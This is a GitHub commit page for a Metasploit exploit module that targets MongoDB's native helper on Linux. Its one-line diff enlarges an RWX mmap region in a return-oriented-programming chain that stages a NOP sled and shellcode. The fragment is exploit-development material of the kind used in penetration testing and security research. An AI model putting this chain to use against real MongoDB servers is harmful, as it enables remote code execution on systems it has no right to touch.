Skip to content

Commit baf1ce2

Browse files
author
agix
committed
increase mmap RWX size
1 parent 4a683ec commit baf1ce2

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/linux/misc/mongod_native_helper.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -36,7 +36,7 @@ def initialize(info={})
3636
0x0816f768, #mmap_64@plt
3737
0x0c0c0c0c, #NOPSLED+SHELLCODE
3838
0x0c0c0000,
39-
0x00001000,
39+
0x00010000,
4040
0x00000007,
4141
0x00000031,
4242
0xffffffff,

0 commit comments

Comments
 (0)